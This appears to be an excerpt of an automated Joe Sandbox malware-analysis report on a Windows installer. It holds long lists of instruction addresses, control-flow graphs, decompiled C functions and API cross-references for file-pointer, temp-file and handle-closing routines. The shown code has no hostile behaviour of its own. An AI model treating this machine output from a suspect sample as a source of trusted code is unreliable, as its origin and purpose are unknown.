                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x00000000
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x00407447
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x004075e5
                                                    0x004075eb
                                                    0x004075ed
                                                    0x004075f4
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000

                                                    Strings
                                                    • FreeEnvironmentStringsW, xrefs: 00406BBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FreeEnvironmentStringsW
                                                    • API String ID: 0-472878650
                                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 579 403479-4034a1 GetTickCount 580 4035d1-4035d9 call 40302e 579->580 581 4034a7-4034d2 call 4035f8 SetFilePointer 579->581 586 4035db-4035df 580->586 587 4034d7-4034e9 581->587 588 4034eb 587->588 589 4034ed-4034fb call 4035e2 587->589 588->589 592 403501-40350d 589->592 593 4035c3-4035c6 589->593 594 403513-403519 592->594 593->586 595 403544-403560 call 406bb0 594->595 596 40351b-403521 594->596 602 403562-40356a 595->602 603 4035cc 595->603 596->595 597 403523-403543 call 40302e 596->597 597->595 605 40356c-403574 call 40620a 602->605 606 40358d-403593 602->606 604 4035ce-4035cf 603->604 604->586 610 403579-40357b 605->610 606->603 607 403595-403597 606->607 607->603 609 403599-4035ac 607->609 609->587 611 4035b2-4035c1 SetFilePointer 609->611 612 4035c8-4035ca 610->612 613 40357d-403589 610->613 611->580 612->604 613->594 614 40358b 613->614 614->609
                                                    C-Code - Quality: 93%
                                                    			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40fa10
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                    0x00403489
                                                    0x0040349c
                                                    0x004034a1
                                                    0x004035d1
                                                    0x004035d3
                                                    0x00000000
                                                    0x004035d9
                                                    0x004034ad
                                                    0x004034c0
                                                    0x004034c6
                                                    0x004034cc
                                                    0x004034d7
                                                    0x004034dc
                                                    0x004034e1
                                                    0x004034e9
                                                    0x004034eb
                                                    0x004034eb
                                                    0x004034f4
                                                    0x004034fb
                                                    0x00000000
                                                    0x00000000
                                                    0x00403501
                                                    0x00403507
                                                    0x0040350d
                                                    0x00000000
                                                    0x00403513
                                                    0x00403519
                                                    0x00403539
                                                    0x0040353e
                                                    0x00403543
                                                    0x00403549
                                                    0x0040354f
                                                    0x00403559
                                                    0x00403560
                                                    0x00000000
                                                    0x00000000
                                                    0x00403562
                                                    0x00403568
                                                    0x0040356a
                                                    0x0040358d
                                                    0x00403593
                                                    0x00000000
                                                    0x00000000
                                                    0x00403595
                                                    0x00403597
                                                    0x00000000
                                                    0x00000000
                                                    0x00403599
                                                    0x00403599
                                                    0x004035ac
                                                    0x00000000
                                                    0x00000000
                                                    0x004035bb
                                                    0x00000000
                                                    0x004035bb
                                                    0x00403574
                                                    0x0040357b
                                                    0x004035c8
                                                    0x004035ce
                                                    0x004035ce
                                                    0x00000000
                                                    0x004035ce
                                                    0x0040357d
                                                    0x00403583
                                                    0x00403589
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004035cc
                                                    0x004035cc
                                                    0x00000000
                                                    0x004035cc
                                                    0x00000000

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 0040348D
                                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,FreeEnvironmentStringsW,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FilePointer$CountTick
                                                    • String ID: FreeEnvironmentStringsW
                                                    • API String ID: 1092082344-472878650
                                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                                                    C-Code - Quality: 100%
                                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                    0x0040618d
                                                    0x00406193
                                                    0x00406194
                                                    0x00406194
                                                    0x00406199
                                                    0x0040619a
                                                    0x0040619d
                                                    0x004061a2
                                                    0x004061a5
                                                    0x004061af
                                                    0x004061bc
                                                    0x004061c0
                                                    0x004061c8
                                                    0x00000000
                                                    0x00000000
                                                    0x004061cc
                                                    0x00000000
                                                    0x004061ce
                                                    0x004061ce
                                                    0x004061ce
                                                    0x004061d1
                                                    0x004061d4
                                                    0x004061d4
                                                    0x004061d7
                                                    0x00000000

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 004061A5
                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                    • API String ID: 1716503409-44229769
                                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                                                    C-Code - Quality: 100%
                                                    			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\nsqC018.tmp\\", 7); // executed
				return _t4;
			}







                                                    0x00403c25
                                                    0x00403c34
                                                    0x00403c37
                                                    0x00403c39
                                                    0x00403c39
                                                    0x00403c40
                                                    0x00403c48
                                                    0x00403c4b
                                                    0x00403c4d
                                                    0x00403c4d
                                                    0x00403c4d
                                                    0x00403c54
                                                    0x00403c60
                                                    0x00403c66

                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                    • C:\Users\user\AppData\Local\Temp\nsqC018.tmp\, xrefs: 00403C5B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqC018.tmp\
                                                    • API String ID: 2962429428-2333943730
                                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
